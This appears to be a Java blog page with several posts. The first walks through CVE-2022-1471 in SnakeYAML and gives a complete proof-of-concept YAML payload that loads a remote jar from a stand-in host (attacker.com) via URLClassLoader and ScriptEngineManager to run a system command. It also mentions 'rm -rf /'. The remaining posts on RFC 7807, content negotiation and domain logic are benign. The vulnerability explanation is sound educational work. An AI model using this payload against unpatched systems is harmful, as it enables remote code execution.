<p><em>Programming and Stuff - Michael Scharhag's Java development blog</em> (https://www.mscharhag.com): A blog about programming and software development topics, mostly focused on Java technologies including Java EE, Spring and Grails.</p>
<h1>Constructing a malicious YAML file for SnakeYAML (CVE-2022-1471)</h1>
<p>Michael Scharhag, 2023-06-06</p>
<p>In this post we will take a closer look at SnakeYAML and <a href="https://nvd.nist.gov/vuln/detail/CVE-2022-1471" rel="nofollow" target="_blank">CVE-2022-1471</a>.</p>
<p>SnakeYAML is a popular Java library for parsing YAML files. For example, Spring Boot uses SnakeYAML to parse YAML configuration files.</p>
<p>In late 2022, a critical vulnerability was discovered in SnakeYAML (referred to as CVE-2022-1471). This allowed an attacker to perform <a href="https://en.wikipedia.org/wiki/Arbitrary_code_execution" rel="nofollow" target="_blank">remote code execution</a> by providing a malicious YAML file. The problem was fixed in SnakeYAML 2.0, released in February 2023.</p>
<p>I recently looked into this vulnerability and learned a few things that I'll try to break down in this post.</p>
<h2>Parsing YAML files with SnakeYAML</h2>
<p>Before we look at the actual security issue, let us take a quick look at how SnakeYAML is actually used in a Java application.</p>
<p>Suppose we have the following YAML file named <em>person.yml</em>:</p>
<pre>
person:
  firstname: john
  lastname: doe
  address:
    street: fooway 42
    city: baz town
</pre>
<p>In our Java code we can parse this YAML file with SnakeYAML like this:</p>
<pre class="brush: java">
Yaml yaml = new Yaml();
FileInputStream fis = new FileInputStream("/path/to/person.yml");
Map<String, Object> parsed = yaml.load(fis);
Map<String, Object> person = (Map<String, Object>) parsed.get("person");
person.get("firstname"); // "john"
person.get("lastname"); // "doe"
person.get("address"); // another map with keys "street" and "city"</pre>
<p><span class="code">yaml.load(fis)</span> returns a <span class="code">Map<String, Object></span> instance that we can navigate through to get the values defined in the YAML file.</p>
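<p>When the structure is only known at runtime, a small helper can take some of the pain out of navigating nested maps. The following is a minimal sketch using only the standard library; <span class="code">YamlMaps</span> and <span class="code">path</span> are hypothetical names and not part of SnakeYAML:</p>

```java
import java.util.Map;
import java.util.Optional;

// Hypothetical helper, not part of SnakeYAML.
final class YamlMaps {
    private YamlMaps() {}

    /**
     * Walks nested maps along the given keys.
     * Returns an empty Optional if a key is missing or a non-map value is hit too early.
     */
    static Optional<Object> path(Map<String, Object> root, String... keys) {
        Object current = root;
        for (String key : keys) {
            if (!(current instanceof Map)) {
                return Optional.empty();
            }
            current = ((Map<?, ?>) current).get(key);
        }
        return Optional.ofNullable(current);
    }
}
```

<p>With the parsed <em>person.yml</em> from above, <span class="code">YamlMaps.path(parsed, "person", "address", "city")</span> would yield the city value without a chain of casts.</p>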
<h2>Mapping YAML content to objects</h2>
<p>Unfortunately, working with maps is usually not very pleasant. So SnakeYAML provides several ways to map YAML content to Java objects.</p>
<p>One way is to use the !! syntax to set a Java type within a YAML object:</p>
<pre>
person:
  !!demo.Person
  firstname: john
  lastname: doe
  address:
    street: fooway 42
    city: baz town</pre>
<p>This tells SnakeYAML to map the contents of the <em>person</em> object to the <span class="code">demo.Person</span> Java class, which looks like this:</p>
<pre class="brush: java">
public class Person {
private String firstname;
private String lastname;
private Address address; // has getter and setter for street and city
// getter and setter
}</pre>
<p>We can now parse the YAML file and get the <em>person</em> object with the mapped YAML values like this:</p>
<pre class="brush: java">
Map<String, Object> parsed = yaml.load(fis);
Person person = (Person) parsed.get("person");
</pre>
<p>SnakeYAML now creates a new Person object using the default constructor and uses setters to set the values defined in the YAML file. We can also instruct SnakeYAML to use constructor parameters instead of setters to set values.</p>
<p>For example, suppose we have the following simple <span class="code">Email</span> value object:</p>
<pre class="brush: java">
public class Email {
private String value;
public Email(String value) {
this.value = value;
}
// getter
}</pre>
<p>Within the YAML file, we can tell SnakeYAML to create an Email object by enclosing the constructor argument in square brackets:</p>
<pre>
person:
  firstname: john
  lastname: doe
  email: !!demo.Email [ john@doe.com ]</pre>
<h2>Where is the security issue?</h2>
<p>What we have seen so far is really all we need to run malicious code from a YAML file. SnakeYAML allows us to create classes, pass constructor parameters and call setters from a provided YAML file.</p>
<p>Assume for a moment that there is a <span class="code">RunSystemCommand</span> class available in the class path. This class executes the system command passed in the constructor as soon as it is created. We could then provide the following YAML file:</p>
<pre>
foo: !!bad.code.RunSystemCommand [ rm -rf / ]</pre>
<p>Which would run the <span class="code">rm -rf /</span> system command right after it is instantiated by SnakeYAML.</p>
<p>Obviously this is a bit too simple, as such a class is unlikely to exist in the classpath. Also remember that we can only control constructors and setters through the YAML file. We cannot call arbitrary methods.</p>
<p>However, the standard Java library contains some interesting classes that can be used for this purpose. A very promising combination is <span class="code">ScriptEngineManager</span> together with <span class="code">URLClassLoader</span>. We will now learn a bit more about these two classes before we integrate them into a YAML file.</p>
<h2>Loading remote code via URLClassLoader</h2>
<p><span class="code">URLClassLoader</span> is a Java <span class="code">ClassLoader</span> that can load classes and resources from jar files located at a specified <span class="code">URL</span>. We can create <span class="code">URLClassLoader</span> like this:</p>
<pre class="brush: java">
URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);
</pre>
<p><span class="code">URLClassLoader</span> takes an array of <span class="code">URL</span>s as constructor parameter. Here we pass a single <span class="code">URL</span> pointing to a jar file on a remote server controlled by the attacker. Our <span class="code">classLoader</span> instance can now be used to load classes from the remote jar file.</p>
<p>If you are curious about how to load a class from a <span class="code">ClassLoader</span> and use it via reflection, here is a simple example. However, this is not necessary for our SnakeYAML experiment.</p>
<pre class="brush: java">
// load class foo.bar.BadCode using the classLoader
Class<?> loadedClass = classLoader.loadClass("foo.bar.BadCode");
// create a new instance of foo.bar.BadCode using the default constructor
Object instance = loadedClass.getDeclaredConstructor().newInstance();
// run the method runMaliciousCode() on our new instance
Method runMaliciousCode = loadedClass.getMethod("runMaliciousCode");
runMaliciousCode.invoke(instance);
</pre>
<h2>Using <span class="code">ScriptEngineManager</span> to run code for us</h2>
<p><span class="code">ScriptEngineManager</span> is another standard Java library class. It implements a discovery and instantiation mechanism for Java script engine support. <span class="code">ScriptEngineManager</span> uses the Java <a href="https://docs.oracle.com/javase/8/docs/technotes/guides/jar/jar.html#Service_Provider" target="_blank">Service Provider mechanism</a> to discover and instantiate available <span class="code">ScriptEngineFactory</span> classes.</p>
<p>The <span class="code">ClassLoader</span> used by <span class="code">ScriptEngineManager</span> can be passed as a constructor parameter:</p>
<pre class="brush: java">
URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);
new ScriptEngineManager(classLoader);</pre>
<p>Here, the newly created <span class="code">ScriptEngineManager</span> will look for <span class="code">ScriptEngineFactory</span> implementations in our attacker-controlled remote jar. And more dangerously: It will instantiate eligible classes from that jar, giving the attacker the ability to run their own code.</p>
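<p>Conceptually, this discovery step resembles a plain <span class="code">ServiceLoader</span> lookup. The sketch below is an approximation and not the actual JDK implementation; <span class="code">FactoryDiscovery</span> is a hypothetical name. Note that iterating over the <span class="code">ServiceLoader</span> instantiates every provider it finds, which is exactly why an attacker-controlled class loader is dangerous here:</p>

```java
import java.util.ArrayList;
import java.util.List;
import java.util.ServiceLoader;
import javax.script.ScriptEngineFactory;

// Hypothetical helper that approximates the discovery step.
final class FactoryDiscovery {
    private FactoryDiscovery() {}

    /** Returns the class names of all ScriptEngineFactory providers visible to the class loader. */
    static List<String> providerClassNames(ClassLoader classLoader) {
        List<String> names = new ArrayList<>();
        // Each iteration step instantiates the provider via its no-arg constructor.
        for (ScriptEngineFactory factory : ServiceLoader.load(ScriptEngineFactory.class, classLoader)) {
            names.add(factory.getClass().getName());
        }
        return names;
    }
}
```

<p>Calling this with the system class loader only lists the factories that ship with the application. Calling it with a class loader that points to untrusted jars runs constructors from those jars.</p>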
<h2>But what content must be provided in the remote jar file?</h2>
<p>We start by creating a malicious implementation of <span class="code">ScriptEngineFactory</span>:</p>
<pre class="brush: java">
package foo.bar;
public class BadScriptEngineFactory implements ScriptEngineFactory {
@Override
public String getEngineName() {
try {
Runtime.getRuntime().exec("calc");
} catch (IOException e) {
throw new RuntimeException(e);
}
return null;
}
// empty stubs for other interface methods
}</pre>
<p>The first method that <span class="code">ScriptEngineManager</span> calls after instantiating a <span class="code">ScriptEngineFactory</span> is <span class="code">getEngineName()</span>. So we use this method to execute our malicious code. In this example, we will simply run the <span class="code">calc</span> system command, which will start the calculator on a Windows system. This is a simple proof that we can run a system command from the provided jar file.</p>
<p>As mentioned earlier, <span class="code">ScriptEngineManager</span> uses the Java Service Provider mechanism to find classes that implement the <span class="code">ScriptEngineFactory</span> interface.</p>
<p>So we need to create a service provider configuration for our <span class="code">ScriptEngineFactory</span>. We do this by creating a file called <em>javax.script.ScriptEngineFactory</em> in the <em>META-INF/services</em> directory. This file must contain the fully qualified name of our <span class="code">ScriptEngineFactory</span>:</p>
<pre>
foo.bar.BadScriptEngineFactory</pre>
<p>We then package the class and configuration file into a jar file called <em>malicious-code.jar</em>. The final layout inside the jar file looks like this:</p>
<ul style="list-style: circle; padding-left: 20px;">
<li>malicious-code.jar
<ul style="list-style: circle; padding-left: 20px;">
<li>META-INF
<ul style="list-style: circle; padding-left: 20px;">
<li>services
<ul style="list-style: circle; padding-left: 20px;">
<li>javax.script.ScriptEngineFactory</li>
</ul>
</li>
<li>MANIFEST.MF</li>
</ul>
</li>
<li>foo
<ul style="list-style: circle; padding-left: 20px;">
<li>bar
<ul style="list-style: circle; padding-left: 20px;">
<li>BadScriptEngineFactory.class</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
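<p>To double-check that a jar really has this layout, we can read the provider configuration back with the standard <span class="code">java.util.jar</span> classes. The following sketch builds a small in-memory jar that contains only the manifest and the service file (no class file) and then lists the configured provider names. <span class="code">ProviderJarLayout</span> and its methods are hypothetical names chosen for this illustration:</p>

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.jar.Attributes;
import java.util.jar.JarEntry;
import java.util.jar.JarInputStream;
import java.util.jar.JarOutputStream;
import java.util.jar.Manifest;

// Hypothetical helper for inspecting the service provider configuration of a jar.
final class ProviderJarLayout {
    static final String SERVICE_FILE = "META-INF/services/javax.script.ScriptEngineFactory";

    private ProviderJarLayout() {}

    /** Builds an in-memory jar with a manifest and the service file only. */
    static byte[] buildJar(String providerClassName) {
        Manifest manifest = new Manifest();
        manifest.getMainAttributes().put(Attributes.Name.MANIFEST_VERSION, "1.0");
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (JarOutputStream jar = new JarOutputStream(bytes, manifest)) {
            jar.putNextEntry(new JarEntry(SERVICE_FILE));
            jar.write((providerClassName + "\n").getBytes(StandardCharsets.UTF_8));
            jar.closeEntry();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return bytes.toByteArray();
    }

    /** Reads the provider class names listed in the service file, skipping blanks and comments. */
    static List<String> providers(byte[] jarBytes) {
        List<String> providers = new ArrayList<>();
        try (JarInputStream jar = new JarInputStream(new ByteArrayInputStream(jarBytes))) {
            for (JarEntry entry = jar.getNextJarEntry(); entry != null; entry = jar.getNextJarEntry()) {
                if (!SERVICE_FILE.equals(entry.getName())) {
                    continue;
                }
                String content = new String(jar.readAllBytes(), StandardCharsets.UTF_8);
                for (String line : content.split("\\R")) {
                    String name = line.trim();
                    if (!name.isEmpty() && !name.startsWith("#")) {
                        providers.add(name);
                    }
                }
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return providers;
    }
}
```

<p>The same <span class="code">providers</span> check can be useful on the defensive side, for example to see which <span class="code">ScriptEngineFactory</span> implementations a third-party jar registers.</p>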
<p>We can now put this jar file on a server and make it available to the <span class="code">URLClassLoader</span> used by the <span class="code">ScriptEngineManager</span>.</p>
<p>To recap the snippet shown earlier:</p>
<pre class="brush: java">
URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);
new ScriptEngineManager(classLoader);</pre>
<p><span class="code">ScriptEngineManager</span> should now detect the <span class="code">BadScriptEngineFactory</span> class within the malicious-code.jar file. Once instantiated, it calls the <span class="code">getEngineName()</span> method, which executes the <span class="code">calc</span> system command. So running this code on a Windows system should open the Windows Calculator.</p>
<h2>Constructing a malicious YAML file</h2>
<p>Now we know enough to return to our original goal: constructing a malicious YAML file for SnakeYAML. As you may have noticed, the previous snippet only included constructor calls and the construction of an array. Both of these can be expressed within a YAML file.</p>
<p>So the final YAML file looks like this:</p>
<pre>
person: !!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL [http://attacker.com/malicious-code.jar]
  ]]
]</pre>
<p>We create a simple <em>person</em> YAML object. For the value we use the !! syntax we saw earlier to create a <span class="code">ScriptEngineManager</span>.</p>
<p>As a constructor parameter we pass a <span class="code">URLClassLoader</span> with a <span class="code">URL</span> pointing to our malicious jar file. Notice that we open two square brackets after <span class="code">URLClassLoader</span>: the first indicates that a constructor argument follows, and the second defines an array.</p>
<p>When this YAML file is parsed with a vulnerable version of SnakeYAML on a Windows system, the calculator opens. This proves that an attacker is able to run code and execute system commands by providing a malicious YAML file.</p>
<h1>A standardized error format for HTTP responses</h1>
<p>Michael Scharhag, 2022-08-10 (updated 2022-08-15)</p>
<p>HTTP uses <a href="https://www.mscharhag.com/api-design/http-status-codes" target="_blank">status codes</a> to indicate the result of the server's attempt to satisfy the request. If the server is unable to process the request, we can choose from a variety of HTTP error codes.</p>
<p>Unfortunately status codes alone often do not provide enough information for API clients. For example, a server might respond with the status code 400 (Bad Request) to indicate the client sent an invalid request. Wouldn't it be nice if the response body would tell us what specific part of the request was invalid or how to resolve the problem?</p>
<p>Status codes are used to define higher level error classes while error details are usually part of the response body. Many APIs use a custom error format for response bodies to provide additional problem information. However, there is also a standard that can help us here, defined in <a href="https://datatracker.ietf.org/doc/html/rfc7807" target="_blank">RFC 7807</a>.</p>
<p>RFC 7807 defines a data model for problem details in JSON and XML. Before coming up with a new generic <em>fault</em> or <em>error</em> response format for your API, it might be worth looking into RFC 7807. However, it is absolutely fine to use your own domain-specific format if it suits your application better.</p>
<h2>RFC 7807: Problem Details for HTTP APIs</h2>
<p>An HTTP response using RFC 7807 might look like this:</p>
<pre>
HTTP/1.1 400 Bad Request
Content-Type: application/problem+json
Content-Language: en

{
  "type": "https://api.my-cool-example.com/problems/required-field-missing",
  "title": "Required field is missing",
  "detail": "Article with id 1234 cannot be updated because the required field 'title' is missing",
  "status": 400,
  "instance": "/articles/1234",
  "field": "title"
}
</pre>
<p>As usual, the HTTP status code (400, Bad Request) gives us a broad indication of the problem. Notice the response Content-Type of <em>application/problem+json</em>. This tells us the response contains an RFC 7807 compliant body. When using XML instead of JSON the Content-Type <em>application/problem+xml</em> is used.</p>
<p>A problem details JSON response can have the following members:</p>
<ul>
<li><em>type </em>(string) - A URI reference that identifies the problem type.</li>
<li><em>title </em>(string) - A short human-readable summary of the problem type. It should not change between multiple occurrences of the same problem type, except for purposes of localization.</li>
<li><em>status </em>(number) - The HTTP status code generated by the origin server.</li>
<li><em>detail </em>(string) - A human-readable description of this specific problem occurrence.</li>
<li><em>instance </em>(string) - A URI that identifies the resource related to this specific problem occurrence.</li>
</ul>
<p>All fields are optional. However, you should at least provide a <em>type</em> value as this is used by consumers to identify the specific problem type. Consumers should not parse the <em>title </em>or <em>detail</em> fields.</p>
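<p>As an illustration, the members listed above can be collected in an ordered map and rendered as JSON. This is a minimal sketch without a JSON library; <span class="code">ProblemDetails</span> and its methods are hypothetical names, and the tiny serializer only escapes quotes and backslashes, so a real application should use a proper JSON library instead:</p>

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.StringJoiner;

// Hypothetical helper for building an RFC 7807 style response body.
final class ProblemDetails {
    private ProblemDetails() {}

    /** Creates the standard members; optional or extension members can be added to the returned map. */
    static Map<String, Object> problem(String type, String title, int status) {
        Map<String, Object> members = new LinkedHashMap<>();
        members.put("type", type);
        members.put("title", title);
        members.put("status", status);
        return members;
    }

    /** Renders a flat map of strings and numbers as a JSON object. */
    static String toJson(Map<String, Object> members) {
        StringJoiner json = new StringJoiner(",", "{", "}");
        for (Map.Entry<String, Object> member : members.entrySet()) {
            Object value = member.getValue();
            String rendered = (value instanceof Number) ? value.toString() : quote(String.valueOf(value));
            json.add(quote(member.getKey()) + ":" + rendered);
        }
        return json.toString();
    }

    // Simplified escaping: handles backslashes and double quotes only.
    private static String quote(String text) {
        return "\"" + text.replace("\\", "\\\\").replace("\"", "\\\"") + "\"";
    }
}
```

<p>The resulting string would be sent with the Content-Type <em>application/problem+json</em>. Additional members such as <em>detail</em> or <em>instance</em> can be added with <span class="code">members.put(...)</span> before rendering.</p>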
<h2>Problem types</h2>
<p>Problem types are used to identify specific problems. A problem type must document:</p>
<ul>
<li>A type URI (that is used in the <em>type </em>field of the response).</li>
<li>A title that describes the problem (used in the <em>title</em> field of the response).</li>
<li>The HTTP status code it is used with.</li>
</ul>
<p>The type URI should resolve to human-readable documentation of the problem (e.g. an HTML document). This URI should be under your control and stable over time.</p>
<p>Problem types may also specify the use of a <em>Retry-After</em> response header if appropriate.</p>
<p>RFC 7807 reserves one special URI as a problem type: <em>about:blank</em>. The problem type <em>about:blank</em> can be used if the problem has no additional semantics besides that of the HTTP status code. In this case, the title should be the same as the HTTP status phrase for that code (e.g. <em>Bad Request</em> for HTTP status 400).</p>
<h2>Extension members</h2>
<p>Problem types may extend the problem details object with additional members to provide additional information.</p>
<p>The <em>field </em>member from the example response shown above is an example of such an extension member. It belongs to the <em>required-field-missing</em> problem type and indicates the missing field. A consumer might parse this member to construct an appropriate error message for the end-user.</p>
<h2>Conclusion</h2>
<p>HTTP status codes alone are often not enough to provide a meaningful problem description.</p>
<p>RFC 7807 defines a standardized format for more detailed problem descriptions within the body of an HTTP response. Before coming up with yet another custom error response format, it might be a good idea to look at the RFC 7807 problem format.</p>
<h1>HTTP - Content negotiation</h1>
<p>Michael Scharhag, 2021-11-22</p>
<p>With HTTP, resources are identified using URIs. A uniquely identified resource might support multiple resource representations. A representation is a specific form of a particular resource.</p>
<p>For example:</p>
<ul>
<li>an HTML page <em>/index.html</em> might be available in different languages</li>
<li>product data located at <em>/products/123</em> can be served in JSON, XML or CSV</li>
<li>an avatar image <em>/user/avatar</em> might be available in JPEG, PNG and GIF formats</li>
</ul>
<p>In all these cases one underlying resource has multiple different representations.</p>
<p><em>Content negotiation</em> is the mechanism used by clients and servers to decide which representation should be used.</p>
<h2>Server-driven and agent-driven content negotiation</h2>
<p>We can differentiate between <em>server-driven</em> and <em>agent-driven</em> content negotiation.</p>
<p>With <em>server-driven</em> content negotiation the client tells the server which representations are preferable. The server then picks the representation that best fits the client's needs.</p>
<p>When using <em>agent-driven</em> content negotiation the server tells the client which representations are available. The client then picks the best matching option.</p>
<p>In practice, <em>server-driven</em> negotiation is used almost exclusively. Unfortunately, there is no standardized format for doing <em>agent-driven</em> negotiation. Additionally, <em>agent-driven</em> negotiation is usually worse for performance as it requires an additional request / response round trip. In the rest of this article we will therefore focus on <em>server-driven</em> negotiation.</p>
<h2>Accept headers</h2>
<p>With server-driven negotiation the client uses headers to indicate supported content formats. A server-side algorithm then uses these headers to decide which resource representation should be returned.</p>
<p>Most commonly used is the <em>Accept</em> header, which communicates the <a href="http://www.mscharhag.com/api-design/media-types-content-type-header" target="_blank">media type</a> preferred by the client. For example, consider the following simple HTTP request containing an <em>Accept</em> header:</p>
<pre>
GET /monthly-report
Accept: text/html; q=1.0, text/*; q=0.8</pre>
<p>The header tells the server that the client understands HTML (media type <em>text/html</em>) and other text based formats (media type <em>text/*</em>).</p>
<p><em>text/*</em> indicates that all <em>subtypes </em>of the text <em>type </em>are supported. To indicate that all media types are supported we can use <em>*/*</em>.</p>
<p>In this example HTML is preferred over other text based formats because it has a higher quality factor (<em>q</em>).</p>
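<p>On the server side, the header first has to be split into media ranges and quality factors. The following is a simplified sketch of that step; <span class="code">AcceptHeader</span> and <span class="code">Range</span> are hypothetical names, a missing <em>q</em> parameter is treated as 1.0, and malformed quality values are not handled:</p>

```java
import java.util.ArrayList;
import java.util.Comparator;
import java.util.List;

// Hypothetical, simplified Accept header parser.
final class AcceptHeader {
    private AcceptHeader() {}

    /** A media range such as text/html or text/* together with its quality factor. */
    static final class Range {
        final String mediaRange;
        final double quality;

        Range(String mediaRange, double quality) {
            this.mediaRange = mediaRange;
            this.quality = quality;
        }
    }

    /** Parses the header value and returns the ranges sorted by descending quality. */
    static List<Range> parse(String header) {
        List<Range> ranges = new ArrayList<>();
        for (String part : header.split(",")) {
            String[] pieces = part.trim().split(";");
            String mediaRange = pieces[0].trim();
            if (mediaRange.isEmpty()) {
                continue;
            }
            double quality = 1.0; // default when no q parameter is given
            for (int i = 1; i < pieces.length; i++) {
                String parameter = pieces[i].trim();
                if (parameter.startsWith("q=")) {
                    quality = Double.parseDouble(parameter.substring(2).trim());
                }
            }
            ranges.add(new Range(mediaRange, quality));
        }
        // List.sort is stable, so ranges with equal quality keep their header order.
        ranges.sort(Comparator.comparingDouble((Range r) -> r.quality).reversed());
        return ranges;
    }
}
```

<p>For the request above, <span class="code">AcceptHeader.parse("text/html; q=1.0, text/*; q=0.8")</span> lists <em>text/html</em> before <em>text/*</em>.</p>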
<p>Ideally a server would respond with an HTML document to this request. For example:</p>
<pre>
HTTP/1.1 200 OK
Content-Type: text/html

<html>
<body>
<h1>Monthly report</h1>
...
</body>
</html></pre>
<p>If returning HTML is not feasible, the server can also respond with another text based format, like<em> text/plain</em>:</p>
<pre>
HTTP/1.1 200 OK
Content-Type: text/plain

Monthly report
Bla bli blu
...</pre>
<p>Besides the <em>Accept</em> header, we can also use the <em>Accept-Language</em> and <em>Accept-Encoding</em> headers. <em>Accept-Language</em> indicates the language preference of the client while <em>Accept-Encoding</em> defines the acceptable content encodings.</p>
<p>Of course all these headers can be used together. For example:</p>
<pre>
GET /monthly-report
Accept: text/html
Accept-Language: en-US; q=1.0, en; q=0.9, fr; q=0.4
Accept-Encoding: gzip, br</pre>
<p>Here the client indicates that it:</p>
<ul>
<li>prefers an HTML document</li>
<li>prefers US English (<em>q=1.0</em>) but also accepts other English variants (<em>q=0.9</em>); if English is not available, French is acceptable too (<em>q=0.4</em>)</li>
<li>supports <em>gzip</em> and Brotli (<em>br</em>) encoding</li>
</ul>
<p>An acceptable response might look like this:</p>
<pre>
HTTP/1.1 200 OK
Content-Type: text/html
Content-Language: en
Content-Encoding: gzip

<gzipped html document></pre>
<h2>What if the server cannot return an acceptable response?</h2>
<p>If the server is unable to fulfill the client's preferences, the HTTP status code 406 (Not Acceptable) can be returned. This status code indicates that the server is unable to produce a response matching the client's preferences.</p>
<p>Depending on the situation it might also be viable to return a response that does not exactly match the client's preferences. For example, assume no language provided in the <em>Accept-Language</em> header is supported by the server. In this case, it can still be a valid option to return a response using a predefined default language. This might be more useful for the client than nothing. The client can then look at the <em>Content-Language</em> header of the response and decide whether to use the response or ignore it.</p>
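<p>The decision between a matching representation and a 406 response can be sketched as follows. This is a simplified illustration, not a complete implementation of the HTTP negotiation rules; <span class="code">Negotiator</span> is a hypothetical name, and the sketch assumes that the most specific matching media range determines the quality of an offered media type:</p>

```java
import java.util.List;
import java.util.Optional;

// Hypothetical, simplified server-driven negotiation for the Accept header.
final class Negotiator {
    private Negotiator() {}

    /** Picks the offered media type with the highest quality, or empty if none is acceptable. */
    static Optional<String> select(String acceptHeader, List<String> available) {
        String best = null;
        double bestQuality = 0.0;
        for (String offered : available) {
            double quality = qualityFor(offered, acceptHeader);
            if (quality > bestQuality) {
                best = offered;
                bestQuality = quality;
            }
        }
        return Optional.ofNullable(best);
    }

    /** 200 if an acceptable representation exists, otherwise 406 (Not Acceptable). */
    static int status(String acceptHeader, List<String> available) {
        return select(acceptHeader, available).isPresent() ? 200 : 406;
    }

    // Quality of the most specific media range that matches; 0.0 if nothing matches.
    private static double qualityFor(String mediaType, String acceptHeader) {
        double quality = 0.0;
        int bestSpecificity = -1;
        for (String part : acceptHeader.split(",")) {
            String[] pieces = part.trim().split(";");
            int specificity = specificity(pieces[0].trim(), mediaType);
            if (specificity > bestSpecificity) {
                bestSpecificity = specificity;
                quality = qualityOf(pieces);
            }
        }
        return quality;
    }

    private static double qualityOf(String[] pieces) {
        for (int i = 1; i < pieces.length; i++) {
            String parameter = pieces[i].trim();
            if (parameter.startsWith("q=")) {
                return Double.parseDouble(parameter.substring(2).trim());
            }
        }
        return 1.0;
    }

    // 2 = exact match, 1 = type/* match, 0 = */* match, -1 = no match
    private static int specificity(String range, String mediaType) {
        if (range.equalsIgnoreCase(mediaType)) {
            return 2;
        }
        if (range.equals("*/*")) {
            return 0;
        }
        if (range.endsWith("/*") && mediaType.regionMatches(true, 0, range, 0, range.length() - 1)) {
            return 1;
        }
        return -1;
    }
}
```

<p>A server that prefers to fall back to a default representation instead of answering with 406 could use <span class="code">select(...).orElse(defaultType)</span>.</p>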
<h2>Content negotiation in REST APIs</h2>
<p>For REST APIs it can be a viable option to support more than one standard representation for resources. For example, with content negotiation we can support JSON and XML and let the client decide which one to use.</p>
<p>CSV can also be an interesting option to consider in certain situations as the response can directly be viewed with tools like Excel. For example, consider the following request:</p>
<pre>
GET /users
Accept: text/csv
</pre>
<p>Instead of returning a JSON (or XML) collection, the server now can respond with a list of users in CSV format.</p>
<pre>
HTTP/1.1 200 OK
Content-Type: text/csv

Id;Username;Email
1;john;john.doe@example.com
2;anna91;anna91@example.com</pre>
<h3><em>Interested in more REST related articles? Have a look at my <a href="https://www.mscharhag.com/p/rest-api-design" target="_blank">REST API design page</a>.</em></h3>
<h1>Avoid leaking domain logic</h1>
<p>Michael Scharhag, 2021-11-01</p>
<p>Many software architectures try to separate domain logic from other parts of the application. To follow this practice we always need to know what is actually domain logic and what is not. Unfortunately, the two are not always easy to separate. If we get this decision wrong, domain logic can easily leak into other components and layers.</p>
<p>We will go through this problem by looking at examples using a hexagonal application architecture. If you are not familiar with <em>hexagonal architecture </em>(also called <em>ports and adapters architecture</em>) you might be interested in the previous post about the <a href="https://www.mscharhag.com/architecture/layer-onion-hexagonal-architecture" target="_blank">transition from a traditional layered architecture to a hexagonal architecture</a>.</p>
<p>Assume a shop system that publishes new orders to a messaging system (like Kafka). Our product owner now tells us that we have to listen for these order events and persist the corresponding order in the database.</p>
<p>Using hexagonal architecture the integration with a messaging system is implemented within an <em>adapter</em>. So, we start with a simple adapter implementation that listens for Kafka events:</p>
<pre class="brush: java">
@AllArgsConstructor
public class KafkaAdapter {
private final SaveOrderUseCase saveOrderUseCase;
@KafkaListener(topics = ...)
public void onNewOrderEvent(NewOrderKafkaEvent event) {
Order order = event.getOrder();
saveOrderUseCase.saveOrder(order);
}
}</pre>
<p>In case you are not familiar with the <span class="code">@AllArgsConstructor</span> annotation from <a href="https://projectlombok.org/" target="_blank">project lombok</a>: It generates a constructor which accepts each field (here <span class="code">saveOrderUseCase</span>) as parameter.</p>
<p>The adapter delegates the saving of the order to a <span class="code">UseCase</span> implementation.</p>
<p><span class="code">UseCase</span>s are part of our domain core and implement domain logic, together with the domain model. Our simple example <span class="code">UseCase</span> looks like this:</p>
<pre class="brush: java">
@AllArgsConstructor
public class SaveOrderUseCase {
private final SaveOrderPort saveOrderPort;
public void saveOrder(Order order) {
saveOrderPort.saveOrder(order);
}
}</pre>
<p>Nothing special here. We simply use an outgoing <span class="code">Port</span> interface to persist the passed order.</p>
<p>While the shown approach might work fine, we have a significant problem here: Our business logic has leaked into the Adapter implementation. Maybe you are wondering: <em>what business logic?</em></p>
<p>We have a simple business rule to implement: Every time a new order is retrieved, it should be persisted. In our current implementation this rule is implemented by the adapter while our business layer (the <span class="code">UseCase</span>) only provides a generic save operation.</p>
<p>Now assume, after some time, a new requirement arrives: Every time a new order is retrieved, a message should be written to an audit log.</p>
<p>With our current implementation we cannot write the audit log message within <span class="code">SaveOrderUseCase</span>. As the name suggests the UseCase is for <em>saving an order</em> and not for <em>retrieving a new order</em> and therefore might be used by other components. So, adding the audit log message here might have undesired side-effects.</p>
<p>The solution is simple: We write the audit log message in our adapter:</p>
<pre class="brush: java">
@AllArgsConstructor
public class KafkaAdapter {
private final SaveOrderUseCase saveOrderUseCase;
private final AuditLog auditLog;
@KafkaListener(topics = ...)
public void onNewOrderEvent(NewOrderKafkaEvent event) {
Order order = event.getOrder();
saveOrderUseCase.saveOrder(order);
auditLog.write("New order retrieved, id: " + order.getId());
}
}</pre>
<p>And now we have made it worse. Even more business logic has leaked into the adapter.</p>
<p>If the <span class="code">auditLog</span> object writes messages into a database, we might also have screwed up transaction handling, which is usually not handled in an incoming adapter.</p>
<h2>Using more specific domain operations</h2>
<p>The core problem here is the generic <span class="code">SaveOrderUseCase</span>. Instead of providing a generic save operation to adapters we should provide a more specific UseCase implementation.</p>
<p>For example, we can create a <span class="code">NewOrderRetrievedUseCase</span> that accepts newly retrieved orders:</p>
<pre class="brush: java">
@AllArgsConstructor
public class NewOrderRetrievedUseCase {
private final SaveOrderPort saveOrderPort;
private final AuditLog auditLog;
@Transactional
public void onNewOrderRetrieved(Order newOrder) {
saveOrderPort.saveOrder(newOrder);
auditLog.write("New order retrieved, id: " + newOrder.getId());
}
}</pre>
<p>Now both business rules are implemented within the UseCase. Our adapter implementation is now simply responsible for mapping incoming data and passing it to the use case:</p>
<pre class="brush: java">
@AllArgsConstructor
public class KafkaAdapter {
private final NewOrderRetrievedUseCase newOrderRetrievedUseCase;
@KafkaListener(topics = ...)
public void onNewOrderEvent(NewOrderKafkaEvent event) {
Order newOrder = event.toNewOrder();
newOrderRetrievedUseCase.onNewOrderRetrieved(newOrder);
}
}</pre>
